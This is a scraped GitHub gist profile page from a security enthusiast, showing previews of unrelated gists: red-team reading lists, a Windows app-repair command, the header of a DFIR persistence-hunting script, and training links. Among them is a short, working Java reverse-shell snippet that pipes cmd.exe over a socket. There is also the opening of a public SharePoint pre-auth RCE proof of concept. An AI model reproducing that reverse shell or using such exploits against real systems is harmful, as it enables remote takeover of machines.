Skip to content

Instantly share code, notes, and snippets.

View Saltinbank-SyS's full-sized avatar
💭
A 1 contre 100 on finira 300 ...

Computer button pusher // Pousseur de boutons en informatique || SIN - SIN HACK - HACK || NO-CODE evangelist || Black coffee like my sense of humor Saltinbank-SyS

💭
A 1 contre 100 on finira 300 ...
View GitHub Profile
From: http://redteams.net/bookshelf/
Techie
Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp.
Social Engineering: The Art of Human Hacking by Christopher Hadnagy
Practical Lock Picking: A Physical Penetration Tester's Training Guide by Deviant Ollam
The Art of Deception: Controlling the Human Element of Security by Kevin Mitnick
Hacking: The Art of Exploitation by Jon Erickson and Hacking Exposed by Stuart McClure and others.
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning by Fyodor
The Shellcoder's Handbook: Discovering and Exploiting Security Holes by several authors
8YOU COULD PRETEND YOU LIKE SMASH
YOU COULD RELEASE BOOZE
YOU COULD PLAY SHADERS
YOU COULD SHIP VIOLENCE
YOU COULD ANNOY HAUJOBB
YOU COULD SMASH MUSIC
YOU COULD ADORE THE DEADLINE
YOU COULD CELEBRATE SMASH
YOU COULD DROP HAUJOBB
YOU COULD SELL SHADERS
@Saltinbank-SyS
Saltinbank-SyS / powershell
Created January 3, 2024 22:55
Provisioning of all app images in Windows Store (installed and missing)
Get-AppxPackage | % { Add-AppxPackage -DisableDevelopmentMode -Register "$($_.InstallLocation)\AppxManifest.xml" -verbose }
#It is supposed to get/add any package missing.
#Also, make sure your "Services" are turned on for all required services, most importantly
#Client License Service (ClipSVC
@Saltinbank-SyS
Saltinbank-SyS / .html
Created December 30, 2023 15:38
Some good intel about mimikatz
https://adsecurity.org/?page_id=1821
@Saltinbank-SyS
Saltinbank-SyS / trawler.ps1
Created December 29, 2023 18:46
TRAWLER DFIR script for FRENCH Windows machines
This file has been truncated, but you can view the full file.
<#
.SYNOPSIS
trawler helps Incident Responders discover suspicious persistence mechanisms on Windows devices.
.DESCRIPTION
trawler inspects a wide variety of Windows artifacts to help discover signals of persistence including the registry, scheduled tasks, services, startup items, etc.
For a full list of artifacts, please see github.com/joeavanzato/trawler
.PARAMETER outpath
The fully-qualified file-path where detection output should be stored as a CSV
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
Free Study Guide
• https://lnkd.in/ebcJM2yX
CompTIA Security+
• https://lnkd.in/en76AA_f
CompTIA CASP+
• https://lnkd.in/eUMURB3s
@Saltinbank-SyS
Saltinbank-SyS / SharePwn_public.py
Created December 16, 2023 13:36 — forked from testanull/SharePwn_public.py
SharePoint Pre-Auth Code Injection RCE chain CVE-2023-29357 & CVE-2023-24955 PoC
# -*- coding: utf-8 -*-
import hashlib
import base64
import requests, string, struct, uuid, random, re
import sys
from collections import OrderedDict
from sys import version
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
# too lazy to deal with string <-> bytes confusion in python3 so forget it ¯\_(ツ)_/¯
@Saltinbank-SyS
Saltinbank-SyS / 1-way-ssl.jpg
Created November 7, 2023 04:48 — forked from mohanpedala/1-way-ssl.jpg
One-Way SSL and Two-Way SSL
1-way-ssl.jpg
👉𝗪𝗛𝗔𝗧 𝗜𝗦 𝗥𝗘𝗗 𝗧𝗘𝗔𝗠?
🌟Red Team definition, redteam guide by Joe Vest & James Tubberville
https://lnkd.in/eUaZcWvg
🌟Red Teaming Handbook, UK Ministry of Defense
https://lnkd.in/euUkwQRq
👉𝗪𝗛𝗔𝗧 𝗔𝗥𝗘 𝗥𝗘𝗗 𝗧𝗘𝗔𝗠 𝗘𝗫𝗘𝗥𝗖𝗜𝗦𝗘𝗦?
🌟NIST’s Definition of Red Team Exercise